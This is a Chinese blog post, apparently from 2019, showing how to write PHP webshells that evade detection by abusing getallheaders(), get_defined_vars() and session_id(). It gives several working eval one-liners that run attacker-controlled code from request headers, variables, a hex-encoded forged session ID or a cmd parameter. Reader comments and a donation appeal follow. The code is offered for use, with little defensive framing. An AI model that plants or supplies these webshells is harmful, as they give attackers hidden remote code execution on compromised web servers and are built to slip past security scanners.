Xcnte

PHP利用Apache、Nginx的特性实现免杀Webshell
get_defined_vars()、getallheaders()是两个特性函数,我们可以通过这两个函数来构造我...
扫描右侧二维码阅读全文
04
2019/06

PHP利用Apache、Nginx的特性实现免杀Webshell

get_defined_vars()getallheaders()是两个特性函数,我们可以通过这两个函数来构造我们的webshell

环境 函数 用法
nginx get_defined_vars() 返回由所有已定义变量所组成的数组
apache getallheaders() 获取全部 HTTP 请求头信息

apache环境

<?php
eval(next(getallheaders())); 
?>

apache和nginx环境通用

<?php
eval(implode(reset(get_defined_vars())));
?>

另外一种通过执行伪造的sessionid值,进行任意代码执行。

<?php
eval(hex2bin(session_id(session_start())));
?>

706870696e666f28293b这个是phpinfo();的hex编码。

给webshell加密码

<?php eval(get_defined_vars()['_GET']['cmd']);?>

支付宝扫码领红包

支付宝红包二维码
Last modification:June 4th, 2019 at 09:08 pm
如果觉得我的文章对你有所帮助,请随意赞赏

Leave a Comment

5 comments

  1. 范明明

    滴!签到卡!请上车的乘客系好安全带,现在是:Thu Jun 13 2019 14:38:03 GMT+0800 (中国标准时间)

  2. 初心

    滴!签到卡!请上车的乘客系好安全带,现在是:Thu Jun 06 2019 15:29:32 GMT+0800 (中国标准时间)

  3. 奶爸de笔记

    写的很简单,也可能本来就是这么简单,但是我看不懂。 ̄﹃ ̄

  4. Xcnte

    滴!签到卡!请上车的乘客系好安全带,现在是:Tue Jun 04 2019 21:11:17 GMT+0800 (中国标准时间)

  5. 早川

    涨姿势了|´・ω・)ノ
    滴!签到卡!请上车的乘客系好安全带,现在是:Tue Jun 04 2019 21:06:57 GMT+0800 (中国标准时间)